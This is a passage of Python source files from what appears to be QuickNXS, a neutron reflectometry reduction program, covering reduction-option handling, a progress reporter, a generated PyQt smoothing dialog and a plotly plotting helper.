There are time-consuming actions that we only want to take
if those values actually changed, as opposed to the user simply
clicking outside the box.
Some parameters don't require a recalculation but simply a
refresh of the plots, such as scaling factors or the number
of points clipped.
Return values:
-1 = no valid change
0 = replot needed
1 = recalculation needed
"""
if self._data_manager.active_channel is None:
return -1
configuration = self._data_manager.active_channel.configuration
valid_change = False
replot_change = False
# ROI parameters
x_pos = self.ui.refXPos.value()
x_width = self.ui.refXWidth.value()
y_pos = self.ui.refYPos.value()
y_width = self.ui.refYWidth.value()
bck_pos = self.ui.bgCenter.value()
bck_width = self.ui.bgWidth.value()
valid_change = valid_change or \
not configuration.peak_position == x_pos or \
not configuration.peak_width == x_width
valid_change = valid_change or \
not configuration.low_res_position == y_pos or \
not configuration.low_res_width == y_width
valid_change = valid_change or \
not configuration.bck_position == bck_pos or \
not configuration.bck_width == bck_width
try:
scale = math.pow(10.0, self.ui.refScale.value())
except:
scale = 1
replot_change = replot_change or \
not configuration.scaling_factor == scale
replot_change = replot_change or \
not configuration.cut_first_n_points == self.ui.rangeStart.value()
replot_change = replot_change or \
not configuration.cut_last_n_points == self.ui.rangeEnd.value()
valid_change = valid_change or \
not configuration.subtract_background == self.ui.bgActive.isChecked()
valid_change = valid_change or \
not configuration.use_constant_q == self.ui.fanReflectivity.isChecked()
valid_change = valid_change or \
not configuration.use_dangle == self.ui.trustDANGLE.isChecked()
valid_change = valid_change or \
not configuration.set_direct_pixel == self.ui.set_dirpix_checkbox.isChecked()
valid_change = valid_change or \
not configuration.set_direct_angle_offset == self.ui.set_dangle0_checkbox.isChecked()
if configuration.set_direct_pixel:
valid_change = valid_change or \
not configuration.direct_pixel_overwrite == self.ui.directPixelOverwrite.value()
if configuration.set_direct_angle_offset:
valid_change = valid_change or \
not configuration.direct_angle_offset_overwrite == self.ui.dangle0Overwrite.value()
# Final rebin
valid_change = valid_change or \
not configuration.do_final_rebin == self.ui.final_rebin_checkbox.isChecked()
valid_change = valid_change or \
not configuration.final_rebin_step == self.ui.q_rebin_spinbox.value()
if valid_change:
return 1
if replot_change:
return 0
return -1
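# Note: compute_offspec_on_change() and compute_gisans_on_change() above treat any
# return value >= 0 (replot or recalculation needed) as a reason to update their output.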
def get_configuration(self):
"""
Gather the reduction options.
"""
if self._data_manager.active_channel is not None:
configuration = self._data_manager.active_channel.configuration
else:
configuration = Configuration(self.main_window.settings)
configuration.tof_bins = self.ui.eventTofBins.value()
configuration.tof_bin_type = self.ui.eventBinMode.currentIndex()
configuration.use_roi = self.ui.use_roi_checkbox.isChecked()
configuration.update_peak_range = self.ui.fit_within_roi_checkbox.isChecked()
configuration.use_roi_bck = self.ui.use_bck_roi_checkbox.isChecked()
# Default ranges, using the current values
x_pos = self.ui.refXPos.value()
x_width = self.ui.refXWidth.value()
y_pos = self.ui.refYPos.value()
y_width = self.ui.refYWidth.value()
bck_pos = self.ui.bgCenter.value()
bck_width = self.ui.bgWidth.value()
configuration.peak_position = x_pos
configuration.peak_width = x_width
configuration.low_res_position = y_pos
configuration.low_res_width = y_width
configuration.bck_position = bck_pos
configuration.bck_width = bck_width
configuration.force_peak_roi = not self.ui.actionAutomaticXPeak.isChecked()
configuration.force_low_res_roi = not self.ui.actionAutoYLimits.isChecked()
configuration.match_direct_beam = self.ui.actionAutoNorm.isChecked()
# Use background on each side of the peak
configuration.use_tight_bck = self.ui.use_side_bck_checkbox.isChecked()
configuration.bck_offset = self.ui.side_bck_width.value()
# Other reduction options
configuration.subtract_background = self.ui.bgActive.isChecked()
try:
scale = math.pow(10.0, self.ui.refScale.value())
except:
scale = 1
configuration.scaling_factor = scale
configuration.cut_first_n_points = self.ui.rangeStart.value()
configuration.cut_last_n_points = self.ui.rangeEnd.value()
configuration.normalize_to_unity = self.ui.normalize_to_unity_checkbox.isChecked()
configuration.total_reflectivity_q_cutoff = self.ui.normalization_q_cutoff_spinbox.value()
configuration.wl_bandwidth = self.ui.bandwidth_spinbox.value()
configuration.use_constant_q = self.ui.fanReflectivity.isChecked()
configuration.use_dangle = self.ui.trustDANGLE.isChecked()
configuration.set_direct_pixel = self.ui.set_dirpix_checkbox.isChecked()
configuration.set_direct_angle_offset = self.ui.set_dangle0_checkbox.isChecked()
configuration.direct_pixel_overwrite = self.ui.directPixelOverwrite.value()
configuration.direct_angle_offset_overwrite = self.ui.dangle0Overwrite.value()
configuration.sample_size = self.ui.sample_size_spinbox.value()
configuration.do_final_rebin = self.ui.final_rebin_checkbox.isChecked()
configuration.final_rebin_step = self.ui.q_rebin_spinbox.value()
# UI elements
configuration.normalize_x_tof = self.ui.normalizeXTof.isChecked()
configuration.x_wl_map = self.ui.xLamda.isChecked()
configuration.angle_map = self.ui.tthPhi.isChecked()
configuration.log_1d = self.ui.logarithmic_y.isChecked()
configuration.log_2d = self.ui.logarithmic_colorscale.isChecked()
# Off-specular options
if self.ui.kizmkfzVSqz.isChecked():
configuration.off_spec_x_axis = Configuration.DELTA_KZ_VS_QZ
elif self.ui.qxVSqz.isChecked():
configuration.off_spec_x_axis = Configuration.QX_VS_QZ
else:
configuration.off_spec_x_axis = Configuration.KZI_VS_KZF
configuration.off_spec_slice = self.ui.offspec_slice_checkbox.isChecked()
configuration.off_spec_slice_qz_min = self.ui.slice_qz_min_spinbox.value()
configuration.off_spec_slice_qz_max = self.ui.slice_qz_max_spinbox.value()
#try:
# qz_list = self.ui.offspec_qz_list_edit.text()
# if len(qz_list) > 0:
# configuration.off_spec_qz_list = [float(x) for x in self.ui.offspec_qz_list_edit.text().split(',')]
#except:
# logging.error("Could not parse off_spec_qz_list: %s", configuration.off_spec_qz_list)
configuration.off_spec_err_weight = self.ui.offspec_err_weight_checkbox.isChecked()
configuration.off_spec_nxbins = self.ui.offspec_rebin_x_bins_spinbox.value()
configuration.off_spec_nybins = self.ui.offspec_rebin_y_bins_spinbox.value()
configuration.off_spec_x_min = self.ui.offspec_x_min_spinbox.value()
configuration.off_spec_x_max = self.ui.offspec_x_max_spinbox.value()
configuration.off_spec_y_min = self.ui.offspec_y_min_spinbox.value()
configuration.off_spec_y_max = self.ui.offspec_y_max_spinbox.value()
# Off-spec smoothing options
configuration.apply_smoothing = self.ui.offspec_smooth_checkbox.isChecked()
# GISANS options
configuration.gisans_wl_min = self.ui.gisans_wl_min_spinbox.value()
configuration.gisans_wl_max = self.ui.gisans_wl_max_spinbox.value()
configuration.gisans_wl_npts = self.ui.gisans_wl_npts_spinbox.value()
configuration.gisans_qz_npts = self.ui.gisans_qz_npts_spinbox.value()
configuration.gisans_qy_npts = self.ui.gisans_qy_npts_spinbox.value()
configuration.gisans_use_pf = self.ui.gisans_pf_radio.isChecked()
# Make the changes persistent
configuration.to_q_settings(self.main_window.settings)
return configuration
def populate_from_configuration(self, configuration=None):
"""
Set reduction options in UI, usually after loading
a reduced data set.
"""
if configuration is None:
configuration = Configuration(self.main_window.settings)
self.ui.eventTofBins.setValue(configuration.tof_bins)
self.ui.eventBinMode.setCurrentIndex(configuration.tof_bin_type)
self.ui.use_roi_checkbox.setChecked(configuration.use_roi)
self.ui.fit_within_roi_checkbox.setChecked(configuration.update_peak_range)
self.ui.use_bck_roi_checkbox.setChecked(configuration.use_roi_bck)
self.ui.actionAutomaticXPeak.setChecked(not configuration.force_peak_roi)
self.ui.actionAutoYLimits.setChecked(not configuration.force_low_res_roi)
# Update reduction parameters
self.ui.refXPos.setValue(configuration.peak_position)
self.ui.refXWidth.setValue(configuration.peak_width)
self.ui.refYPos.setValue(configuration.low_res_position)
self.ui.refYWidth.setValue(configuration.low_res_width)
self.ui.bgCenter.setValue(configuration.bck_position)
self.ui.bgWidth.setValue(configuration.bck_width)
# Use background on each side of the peak
self.ui.use_side_bck_checkbox.setChecked(configuration.use_tight_bck)
self.ui.side_bck_width.setValue(configuration.bck_offset)
# Subtract background
self.ui.bgActive.setChecked(configuration.subtract_background)
# Scaling factor
try:
scale = math.log10(configuration.scaling_factor)
except:
scale = 0.0
self.ui.refScale.setValue(scale)
# Cut first and last points
self.ui.rangeStart.setValue(configuration.cut_first_n_points)
self.ui.rangeEnd.setValue(configuration.cut_last_n_points)
self.ui.normalize_to_unity_checkbox.setChecked(configuration.normalize_to_unity)
self.ui.normalization_q_cutoff_spinbox.setValue(configuration.total_reflectivity_q_cutoff)
self.ui.bandwidth_spinbox.setValue(configuration.wl_bandwidth)
self.ui.fanReflectivity.setChecked(configuration.use_constant_q)
self.ui.trustDANGLE.setChecked(configuration.use_dangle)
self.ui.set_dirpix_checkbox.setChecked(configuration.set_direct_pixel)
self.ui.set_dangle0_checkbox.setChecked(configuration.set_direct_angle_offset)
self.ui.directPixelOverwrite.setValue(configuration.direct_pixel_overwrite)
self.ui.dangle0Overwrite.setValue(configuration.direct_angle_offset_overwrite)
self.ui.sample_size_spinbox.setValue(configuration.sample_size)
self.ui.final_rebin_checkbox.setChecked(configuration.do_final_rebin)
self.ui.q_rebin_spinbox.setValue(configuration.final_rebin_step)
# UI elements
self.ui.normalizeXTof.setChecked(configuration.normalize_x_tof)
self.ui.xLamda.setChecked(configuration.x_wl_map)
self.ui.tthPhi.setChecked(configuration.angle_map)
self.ui.logarithmic_y.setChecked(configuration.log_1d)
self.ui.logarithmic_colorscale.setChecked(configuration.log_2d)
# Off-specular options
if configuration.off_spec_x_axis == Configuration.DELTA_KZ_VS_QZ:
self.ui.kizmkfzVSqz.setChecked(True)
elif configuration.off_spec_x_axis == Configuration.QX_VS_QZ:
self.ui.qxVSqz.setChecked(True)
else:
self.ui.kizVSkfz.setChecked(True)
self.ui.offspec_slice_checkbox.setChecked(configuration.off_spec_slice)
#self.ui.offspec_qz_list_edit.setText(','.join([str(x) for x in configuration.off_spec_qz_list]))
self.ui.slice_qz_min_spinbox.setValue(configuration.off_spec_slice_qz_min)
self.ui.slice_qz_max_spinbox.setValue(configuration.off_spec_slice_qz_max)
self.ui.offspec_err_weight_checkbox.setChecked(configuration.off_spec_err_weight)
self.ui.offspec_rebin_x_bins_spinbox.setValue(configuration.off_spec_nxbins)
self.ui.offspec_rebin_y_bins_spinbox.setValue(configuration.off_spec_nybins)
self.ui.offspec_x_min_spinbox.setValue(configuration.off_spec_x_min)
self.ui.offspec_x_max_spinbox.setValue(configuration.off_spec_x_max)
self.ui.offspec_y_min_spinbox.setValue(configuration.off_spec_y_min)
self.ui.offspec_y_max_spinbox.setValue(configuration.off_spec_y_max)
# Off-spec smoothing options
self.ui.offspec_smooth_checkbox.setChecked(configuration.apply_smoothing)
# GISANS options
self.ui.gisans_wl_min_spinbox.setValue(configuration.gisans_wl_min)
self.ui.gisans_wl_max_spinbox.setValue(configuration.gisans_wl_max)
self.ui.gisans_wl_npts_spinbox.setValue(configuration.gisans_wl_npts)
self.ui.gisans_qz_npts_spinbox.setValue(configuration.gisans_qz_npts)
self.ui.gisans_qy_npts_spinbox.setValue(configuration.gisans_qy_npts)
self.ui.gisans_pf_radio.setChecked(configuration.gisans_use_pf)
def stitch_reflectivity(self):
"""
Stitch the reflectivity parts and normalize to 1.
"""
# Update the configuration so we can remember the cutoff value
# later if it was changed
self.get_configuration()
self._data_manager.stitch_data_sets(normalize_to_unity=self.ui.normalize_to_unity_checkbox.isChecked(),
q_cutoff=self.ui.normalization_q_cutoff_spinbox.value())
for i in range(len(self._data_manager.reduction_list)):
xs = self._data_manager.active_channel.name
d = self._data_manager.reduction_list[i].cross_sections[xs]
self.ui.reductionTable.setItem(i, 1,
QtWidgets.QTableWidgetItem("%.4f"%(d.configuration.scaling_factor)))
self.main_window.initiate_reflectivity_plot.emit(False)
def trim_data_to_normalization(self):
"""
Cut the start and end of the active data set to 5% of its
maximum intensity.
"""
trim_points = self._data_manager.get_trim_values()
if trim_points is not None:
self.ui.rangeStart.setValue(trim_points[0])
self.ui.rangeEnd.setValue(trim_points[1])
self.update_tables()
self.main_window.initiate_reflectivity_plot.emit(False)
else:
self.report_message("No direct beam found to trim data", pop_up=False)
def strip_overlap(self):
"""
Remove overlapping points in the reflectivity, always cutting from the lower-Qz
measurements.
"""
self._data_manager.strip_overlap()
for i in range(len(self._data_manager.reduction_list)):
xs = self._data_manager.active_channel.name
d = self._data_manager.reduction_list[i].cross_sections[xs]
self.ui.reductionTable.setItem(i, 3,
QtWidgets.QTableWidgetItem(str(d.configuration.cut_last_n_points)))
self.main_window.initiate_reflectivity_plot.emit(False)
def report_message(self, message, informative_message=None,
detailed_message=None, pop_up=False, is_error=False):
"""
Report a message to the user, optionally in a pop-up dialog and/or as an error.
:param str message: message string to be reported
:param str informative_message: extra information
:param str detailed_message: detailed message for the log
:param bool pop_up: if True, a dialog will pop up
:param bool is_error: if True, the message is logged on the error channel
"""
self.status_message.setText(message)
if is_error:
logging.error(message)
if detailed_message is not None:
logging.error(detailed_message)
elif pop_up:
logging.warning(message)
else:
logging.info(message)
if pop_up:
msg = QtWidgets.QMessageBox()
msg.setIcon(QtWidgets.QMessageBox.Warning)
msg.setText(message)
msg.setWindowTitle("Information")
if informative_message is not None:
msg.setInformativeText(informative_message)
if detailed_message is not None:
msg.setDetailedText(detailed_message)
msg.setStandardButtons(QtWidgets.QMessageBox.Ok)
msg.exec_()
def show_results(self):
"""
Pop up the result viewer
"""
from ..result_viewer import ResultViewer
dialog=ResultViewer(self.main_window, self._data_manager)
dialog.specular_compare_widget.ui.refl_preview_checkbox.setChecked(True)
self.main_window.update_specular_viewer.connect(dialog.update_specular)
self.main_window.update_off_specular_viewer.connect(dialog.update_off_specular)
self.main_window.update_gisans_viewer.connect(dialog.update_gisans)
dialog.show()
```
#### File: interfaces/event_handlers/progress_reporter.py
```python
from __future__ import absolute_import, division, print_function, unicode_literals
class ProgressReporter(object):
"""
Progress reporter class that allows for sub-tasks.
"""
def __init__(self, max_value=100, call_back=None,
status_bar=None, progress_bar=None):
"""
:param int max_value: value corresponding to this task being 100% complete
:param call_back: optional function called with the status message on each update
:param status_bar: optional widget with a setText() method used for messages
:param progress_bar: optional widget with a setValue() method used for progress
"""
self.max_value = max_value
self.message = ''
self.call_back = call_back
self.value = 0
self.sub_tasks = []
self.status_bar = status_bar
self.progress_bar = progress_bar
def __call__(self, value, message='', out_of=None):
"""
Shortcut to set_value() so that the object can be used
as a function to be compatible with QProgressDialog.setValue().
"""
return self.set_value(value, message, out_of)
def set_value(self, value, message='', out_of=None):
"""
Set the value of a progress indicator
:param int value: completion value, in units of max_value unless out_of is given
:param str message: message to be displayed
:param out_of: if given, value is rescaled so that out_of corresponds to max_value
"""
if out_of is not None:
value = int(value / out_of * self.max_value)
value = min(value, self.max_value)
self.value = value
self.update(message)
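# Example for set_value(): on a reporter created with max_value=100, set_value(3, out_of=10)
# records 30, while set_value(150) is clipped to 100; both then call update() so the
# parent task and the progress bar stay in sync.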
def update(self, message=''):
"""
Updates the progress status according to
sub-tasks.
:param str message: message to be displayed
"""
_value = self.value
for item in self.sub_tasks:
_value += min(item.value, item.max_value)
_value = min(_value, self.max_value)
if self.call_back is not None:
self.call_back(message)
if self.progress_bar:
self.progress_bar.setValue(_value)
if message and self.status_bar:
self.status_bar.setText(message)
def create_sub_task(self, max_value):
"""
Create a sub-task, with max_value being its portion
of the complete task. Returns a call-back function
to be called by the worker to update the progress.
:param int max_value: portion of the task
"""
sub_task_progress = ProgressReporter(max_value, self.update)
self.sub_tasks.append(sub_task_progress)
return sub_task_progress
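# A rough usage sketch (the task split and widget names are hypothetical; `bar` and `label`
# stand for the QProgressBar and QLabel that MainHandler passes in):
#   progress = ProgressReporter(max_value=100, progress_bar=bar, status_bar=label)
#   load_task = progress.create_sub_task(max_value=60)    # loading counts for 60% of the total
#   reduce_task = progress.create_sub_task(max_value=40)  # reduction for the remaining 40%
#   load_task(30, 'Loading events...')    # overall progress becomes 30
#   reduce_task(40, 'Reducing...')        # overall progress becomes 70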
```
#### File: interfaces/generated/ui_smooth_dialog.py
```python
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_Dialog(object):
def setupUi(self, Dialog):
Dialog.setObjectName("Dialog")
Dialog.resize(781, 608)
icon = QtGui.QIcon()
icon.addPixmap(QtGui.QPixmap(":/General/logo.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
Dialog.setWindowIcon(icon)
self.verticalLayout_2 = QtWidgets.QVBoxLayout(Dialog)
self.verticalLayout_2.setObjectName("verticalLayout_2")
self.horizontalLayout_2 = QtWidgets.QHBoxLayout()
self.horizontalLayout_2.setObjectName("horizontalLayout_2")
self.verticalLayout = QtWidgets.QVBoxLayout()
self.verticalLayout.setObjectName("verticalLayout")
self.label = QtWidgets.QLabel(Dialog)
self.label.setAlignment(QtCore.Qt.AlignCenter)
self.label.setObjectName("label")
self.verticalLayout.addWidget(self.label)
self.horizontalLayout = QtWidgets.QHBoxLayout()
self.horizontalLayout.setObjectName("horizontalLayout")
self.kizmkfzVSqz = QtWidgets.QRadioButton(Dialog)
self.kizmkfzVSqz.setChecked(True)
self.kizmkfzVSqz.setObjectName("kizmkfzVSqz")
self.horizontalLayout.addWidget(self.kizmkfzVSqz)
self.qxVSqz = QtWidgets.QRadioButton(Dialog)
self.qxVSqz.setObjectName("qxVSqz")
self.horizontalLayout.addWidget(self.qxVSqz)
self.kizVSkfz = QtWidgets.QRadioButton(Dialog)
self.kizVSkfz.setObjectName("kizVSkfz")
self.horizontalLayout.addWidget(self.kizVSkfz)
self.verticalLayout.addLayout(self.horizontalLayout)
self.plot = MPLWidget(Dialog)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.plot.sizePolicy().hasHeightForWidth())
self.plot.setSizePolicy(sizePolicy)
self.plot.setObjectName("plot")
self.verticalLayout.addWidget(self.plot)
self.horizontalLayout_2.addLayout(self.verticalLayout)
self.widget = QtWidgets.QWidget(Dialog)
self.widget.setObjectName("widget")
self.gridLayout = QtWidgets.QGridLayout(self.widget)
self.gridLayout.setContentsMargins(0, 0, 0, 0)
self.gridLayout.setObjectName("gridLayout")
self.gridXmax = QtWidgets.QDoubleSpinBox(self.widget)
self.gridXmax.setDecimals(6)
self.gridXmax.setMinimum(-1.0)
self.gridXmax.setMaximum(1.0)
self.gridXmax.setSingleStep(0.001)
self.gridXmax.setProperty("value", 0.01)
self.gridXmax.setObjectName("gridXmax")
self.gridLayout.addWidget(self.gridXmax, 2, 3, 1, 1)
self.sigmasCoupled = QtWidgets.QToolButton(self.widget)
icon = QtGui.QIcon.fromTheme("system-lock-screen")
self.sigmasCoupled.setIcon(icon)
self.sigmasCoupled.setCheckable(True)
self.sigmasCoupled.setChecked(True)
self.sigmasCoupled.setObjectName("sigmasCoupled")
self.gridLayout.addWidget(self.sigmasCoupled, 12, 0, 1, 1)
spacerItem = QtWidgets.QSpacerItem(20, 20, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Maximum)
self.gridLayout.addItem(spacerItem, 5, 3, 1, 1)
self.sigmaY = QtWidgets.QDoubleSpinBox(self.widget)
self.sigmaY.setEnabled(False)
self.sigmaY.setDecimals(6)
self.sigmaY.setMinimum(1e-06)
self.sigmaY.setMaximum(1.0)
self.sigmaY.setSingleStep(0.00025)
self.sigmaY.setProperty("value", 0.0005)
self.sigmaY.setObjectName("sigmaY")
self.gridLayout.addWidget(self.sigmaY, 12, 3, 1, 1)
self.label_12 = QtWidgets.QLabel(self.widget)
self.label_12.setObjectName("label_12")
self.gridLayout.addWidget(self.label_12, 4, 2, 1, 1)
self.label_10 = QtWidgets.QLabel(self.widget)
self.label_10.setObjectName("label_10")
self.gridLayout.addWidget(self.label_10, 2, 2, 1, 1)
self.label_2 = QtWidgets.QLabel(self.widget)
self.label_2.setObjectName("label_2")
self.gridLayout.addWidget(self.label_2, 10, 0, 1, 1)
self.label_11 = QtWidgets.QLabel(self.widget)
self.label_11.setObjectName("label_11")
self.gridLayout.addWidget(self.label_11, 3, 2, 1, 1)
spacerItem1 = QtWidgets.QSpacerItem(20, 15, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Maximum)
self.gridLayout.addItem(spacerItem1, 13, 3, 1, 1)
self.buttonBox = QtWidgets.QDialogButtonBox(self.widget)
self.buttonBox.setOrientation(QtCore.Qt.Horizontal)
self.buttonBox.setStandardButtons(QtWidgets.QDialogButtonBox.Cancel|QtWidgets.QDialogButtonBox.Ok)
self.buttonBox.setObjectName("buttonBox")
self.gridLayout.addWidget(self.buttonBox, 16, 0, 1, 4)
self.label_8 = QtWidgets.QLabel(self.widget)
self.label_8.setObjectName("label_8")
self.gridLayout.addWidget(self.label_8, 12, 2, 1, 1)
self.label_5 = QtWidgets.QLabel(self.widget)
self.label_5.setObjectName("label_5")
self.gridLayout.addWidget(self.label_5, 1, 0, 1, 1)
self.label_7 = QtWidgets.QLabel(self.widget)
self.label_7.setObjectName("label_7")
self.gridLayout.addWidget(self.label_7, 10, 2, 1, 1)
self.gridYmin = QtWidgets.QDoubleSpinBox(self.widget)
self.gridYmin.setDecimals(6)
self.gridYmin.setMinimum(-1.0)
self.gridYmin.setMaximum(1.0)
self.gridYmin.setSingleStep(0.001)
self.gridYmin.setObjectName("gridYmin")
self.gridLayout.addWidget(self.gridYmin, 3, 3, 1, 1)
spacerItem2 = QtWidgets.QSpacerItem(20, 20, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Maximum)
self.gridLayout.addItem(spacerItem2, 9, 3, 1, 1)
self.label_13 = QtWidgets.QLabel(self.widget)
self.label_13.setAlignment(QtCore.Qt.AlignCenter)
self.label_13.setObjectName("label_13")
self.gridLayout.addWidget(self.label_13, 0, 0, 1, 4)
self.label_9 = QtWidgets.QLabel(self.widget)
self.label_9.setObjectName("label_9")
self.gridLayout.addWidget(self.label_9, 1, 2, 1, 1)
self.gridYmax = QtWidgets.QDoubleSpinBox(self.widget)
self.gridYmax.setDecimals(6)
self.gridYmax.setMinimum(-1.0)
self.gridYmax.setMaximum(1.0)
self.gridYmax.setSingleStep(0.001)
self.gridYmax.setProperty("value", 0.025)
self.gridYmax.setObjectName("gridYmax")
self.gridLayout.addWidget(self.gridYmax, 4, 3, 1, 1)
self.gridSizeCoupled = QtWidgets.QToolButton(self.widget)
icon = QtGui.QIcon.fromTheme("system-lock-screen")
self.gridSizeCoupled.setIcon(icon)
self.gridSizeCoupled.setCheckable(True)
self.gridSizeCoupled.setChecked(True)
self.gridSizeCoupled.setObjectName("gridSizeCoupled")
self.gridLayout.addWidget(self.gridSizeCoupled, 8, 0, 1, 1)
self.label_3 = QtWidgets.QLabel(self.widget)
self.label_3.setObjectName("label_3")
self.gridLayout.addWidget(self.label_3, 6, 0, 1, 1)
self.label_4 = QtWidgets.QLabel(self.widget)
self.label_4.setObjectName("label_4")
self.gridLayout.addWidget(self.label_4, 8, 2, 1, 1)
self.gridSizeX = QtWidgets.QSpinBox(self.widget)
self.gridSizeX.setEnabled(False)
self.gridSizeX.setMinimum(10)
self.gridSizeX.setMaximum(1000)
self.gridSizeX.setSingleStep(10)
self.gridSizeX.setProperty("value", 200)
self.gridSizeX.setObjectName("gridSizeX")
self.gridLayout.addWidget(self.gridSizeX, 6, 3, 1, 1)
self.gridXmin = QtWidgets.QDoubleSpinBox(self.widget)
self.gridXmin.setDecimals(6)
self.gridXmin.setMinimum(-1.0)
self.gridXmin.setMaximum(1.0)
self.gridXmin.setSingleStep(0.001)
self.gridXmin.setProperty("value", -0.01)
self.gridXmin.setObjectName("gridXmin")
self.gridLayout.addWidget(self.gridXmin, 1, 3, 1, 1)
self.label_6 = QtWidgets.QLabel(self.widget)
self.label_6.setObjectName("label_6")
self.gridLayout.addWidget(self.label_6, 6, 2, 1, 1)
self.sigmaX = QtWidgets.QDoubleSpinBox(self.widget)
self.sigmaX.setDecimals(6)
self.sigmaX.setMinimum(1e-06)
self.sigmaX.setMaximum(1.0)
self.sigmaX.setSingleStep(0.00025)
self.sigmaX.setProperty("value", 0.0005)
self.sigmaX.setObjectName("sigmaX")
self.gridLayout.addWidget(self.sigmaX, 10, 3, 1, 1)
spacerItem3 = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)
self.gridLayout.addItem(spacerItem3, 15, 3, 1, 1)
self.gridSizeY = QtWidgets.QSpinBox(self.widget)
self.gridSizeY.setEnabled(False)
self.gridSizeY.setMinimum(10)
self.gridSizeY.setMaximum(1000)
self.gridSizeY.setSingleStep(10)
self.gridSizeY.setProperty("value", 200)
self.gridSizeY.setObjectName("gridSizeY")
self.gridLayout.addWidget(self.gridSizeY, 8, 3, 1, 1)
self.label_14 = QtWidgets.QLabel(self.widget)
self.label_14.setObjectName("label_14")
self.gridLayout.addWidget(self.label_14, 14, 0, 1, 1)
self.rSigmas = QtWidgets.QDoubleSpinBox(self.widget)
self.rSigmas.setMinimum(1.0)
self.rSigmas.setMaximum(10.0)
self.rSigmas.setProperty("value", 3.0)
self.rSigmas.setObjectName("rSigmas")
self.gridLayout.addWidget(self.rSigmas, 14, 3, 1, 1)
self.horizontalLayout_2.addWidget(self.widget)
self.verticalLayout_2.addLayout(self.horizontalLayout_2)
self.retranslateUi(Dialog)
self.kizmkfzVSqz.clicked.connect(Dialog.drawPlot)
self.kizVSkfz.clicked.connect(Dialog.drawPlot)
self.qxVSqz.clicked.connect(Dialog.drawPlot)
self.gridSizeCoupled.clicked['bool'].connect(self.gridSizeY.setDisabled)
self.sigmasCoupled.clicked['bool'].connect(self.sigmaY.setDisabled)
self.buttonBox.accepted.connect(Dialog.accept)
self.buttonBox.rejected.connect(Dialog.reject)
self.gridXmin.valueChanged['double'].connect(Dialog.updateSettings)
self.gridXmax.valueChanged['double'].connect(Dialog.updateSettings)
self.gridYmin.valueChanged['double'].connect(Dialog.updateSettings)
self.gridYmax.valueChanged['double'].connect(Dialog.updateSettings)
self.sigmaX.valueChanged['double'].connect(Dialog.updateSettings)
self.sigmaY.valueChanged['double'].connect(Dialog.updateSettings)
self.gridSizeCoupled.clicked.connect(Dialog.updateGrid)
self.sigmasCoupled.clicked.connect(Dialog.updateSettings)
self.gridSizeCoupled.clicked['bool'].connect(self.gridSizeX.setDisabled)
QtCore.QMetaObject.connectSlotsByName(Dialog)
Dialog.setTabOrder(self.gridXmin, self.gridXmax)
Dialog.setTabOrder(self.gridXmax, self.gridYmin)
Dialog.setTabOrder(self.gridYmin, self.gridYmax)
Dialog.setTabOrder(self.gridYmax, self.gridSizeX)
Dialog.setTabOrder(self.gridSizeX, self.gridSizeY)
Dialog.setTabOrder(self.gridSizeY, self.sigmaX)
Dialog.setTabOrder(self.sigmaX, self.sigmaY)
Dialog.setTabOrder(self.sigmaY, self.rSigmas)
Dialog.setTabOrder(self.rSigmas, self.buttonBox)
Dialog.setTabOrder(self.buttonBox, self.kizmkfzVSqz)
Dialog.setTabOrder(self.kizmkfzVSqz, self.qxVSqz)
Dialog.setTabOrder(self.qxVSqz, self.kizVSkfz)
Dialog.setTabOrder(self.kizVSkfz, self.gridSizeCoupled)
Dialog.setTabOrder(self.gridSizeCoupled, self.sigmasCoupled)
def retranslateUi(self, Dialog):
_translate = QtCore.QCoreApplication.translate
Dialog.setWindowTitle(_translate("Dialog", "QuickNXS - Smooth Off-Specular"))
self.label.setText(_translate("Dialog", "Off-Specular Preview"))
self.kizmkfzVSqz.setText(_translate("Dialog", "(ki_z-kf_z) VS. Qz"))
self.qxVSqz.setText(_translate("Dialog", "Qx VS. Qz"))
self.kizVSkfz.setText(_translate("Dialog", "ki_z VS. kf_z"))
self.label_12.setText(_translate("Dialog", "Y2"))
self.label_10.setText(_translate("Dialog", "X2"))
self.label_2.setText(_translate("Dialog", "Sigma"))
self.label_11.setText(_translate("Dialog", "Y1"))
self.label_8.setText(_translate("Dialog", "Y"))
self.label_5.setText(_translate("Dialog", "Grid Region"))
self.label_7.setText(_translate("Dialog", "X"))
self.label_13.setText(_translate("Dialog", "Smoothing Parameters"))
self.label_9.setText(_translate("Dialog", "X1"))
self.label_3.setText(_translate("Dialog", "Grid Size"))
self.label_4.setText(_translate("Dialog", "Y"))
self.label_6.setText(_translate("Dialog", "X"))
self.label_14.setText(_translate("Dialog", "R [Sigmas]"))
from .mplwidget import MPLWidget
import icons_rc
```
#### File: test/notebooks/plot_utils.py
```python
import numpy as np
import plotly.offline as py
import plotly.graph_objs as go
from functools import reduce  # reduce is not a builtin on Python 3; read_settings() below relies on it
py.init_notebook_mode(connected=True)
def plot1d(data_list, data_names=None, x_title='', y_title='',
x_log=False, y_log=False, show_dx=True, width=600, height=400):
"""
Produce a 1D plot
@param data_list: list of traces [ [x1, y1], [x2, y2], ...]
@param data_names: name for each trace, for the legend
"""
from plotly.offline import plot
# Create traces
if not isinstance(data_list, list):
raise RuntimeError("plot1d: data_list parameter is expected to be a list")
# Catch the case where the list is in the format [x y]
data = []
show_legend = False
if len(data_list) == 2 and not isinstance(data_list[0], list):
label = ''
if isinstance(data_names, list) and len(data_names) == 1:
label = data_names[0]
show_legend = True
data = [go.Scatter(name=label, x=data_list[0], y=data_list[1])]
else:
for i in range(len(data_list)):
label = ''
if isinstance(data_names, list) and len(data_names) == len(data_list):
label = data_names[i]
show_legend = True
err_x = {}
err_y = {}
if len(data_list[i]) >= 3:
err_y = dict(type='data', array=data_list[i][2], visible=True)
if len(data_list[i]) >= 4:
err_x = dict(type='data', array=data_list[i][3], visible=True)
if show_dx is False:
err_x['thickness'] = 0
data.append(go.Scatter(name=label, x=data_list[i][0], y=data_list[i][1],
error_x=err_x, error_y=err_y))
x_layout = dict(title=x_title, zeroline=False, exponentformat="power",
showexponent="all", showgrid=True,
showline=True, mirror="all", ticks="inside")
